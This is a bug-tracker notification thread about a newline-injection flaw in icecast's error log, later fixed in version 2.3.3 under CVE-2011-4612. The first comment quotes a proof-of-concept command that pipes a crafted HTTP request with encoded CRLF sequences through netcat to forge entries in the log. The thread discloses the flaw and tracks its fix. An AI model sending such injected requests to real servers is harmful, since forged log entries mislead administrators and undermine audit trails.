Launchpad has imported 5 comments from the remote bug at https://bugs.gentoo.org/show_bug.cgi?id=394847.
If you reply to an imported comment from within Launchpad, your comment will be sent to the remote bug automatically. Read more about Launchpad's inter-bugtracker facilities at https://help.launchpad.net/InterBugTracking. ------------------------------------------------------------------------ On 2011-12-15T19:08:02+00:00 Petr Písař wrote: Jamie Strandboge <ja...@canonical.com> reported to icecast developers (CCing <oss-secur...@lists.openwall.com>) about possibility to inject fake message into icecast error log by specially crafted HTTP request sent to icecast server port discovered by Moritz Naumann: "Newline injection in error.log Running this command against an icecast2 running on 127.0.0.1... echo -ne "GET /non-existent"'"'"%20No%20such%20file%20or%20directory%0d% 0a[1970-01-01%20%2000:00:00]%20PHUN%20I'm%20feeling%20phunny%0d% 0a["`date "+%Y-%m-%d%%20%%20%H:%M:%S"`"]%20WARN% 20fserve/fserve_client_create%20req%20for%20file% 20"'"'"/usr/share/icecast2/web/ HTTP/1.0\n\n" | nc -vv 127.0.0.1 8000 > /dev/null ...causes the following to be written to /var/log/icecast2/error.log: [2011-11-25 15:37:31] INFO fserve/fserve_client_create checking for file /non-existent" No such file or directory [1970-01-01 00:00:00] PHUN I'm feeling phunny ..." Source: http://thread.gmane.org/gmane.comp.audio.icecast.devel/1815 Upstream responded fixing 2.3.3 version would be released soon. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/3 ------------------------------------------------------------------------ On 2011-12-15T20:54:20+00:00 Underling wrote: Thanks for the bug, Petr. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/4 ------------------------------------------------------------------------ On 2011-12-15T22:45:24+00:00 N0idx80 wrote: I was able to reproduce the fake log file with the same info as referenced here: https://bugs.launchpad.net/ubuntu/+source/icecast2/+bug/894782 netcat must be installed of course Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/6 ------------------------------------------------------------------------ On 2012-07-10T10:24:22+00:00 Barzog wrote: Any news? Because 2.3.3 is released. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/23 ------------------------------------------------------------------------ On 2012-07-10T16:58:54+00:00 Petr Písař wrote: The 2.3.3 fixes this issue: r18355 | dm8tbr | 2012-06-07 17:57:11 +0200 (Čt, 07 čen 2012) | 3 lines This is part of the patch-set addressing CVE-2011-4612. Reply at: https://bugs.launchpad.net/icecast/+bug/894782/comments/24 ** Changed in: gentoo Importance: Unknown => Low -- You received this bug notification because you are a member of Ubuntu Bugs, which is subscribed to Ubuntu. https://bugs.launchpad.net/bugs/894782 Title: Newline injection in error.log To manage notifications about this bug go to: https://bugs.launchpad.net/icecast/+bug/894782/+subscriptions -- ubuntu-bugs mailing list ubuntu-bugs@lists.ubuntu.com https://lists.ubuntu.com/mailman/listinfo/ubuntu-bugs
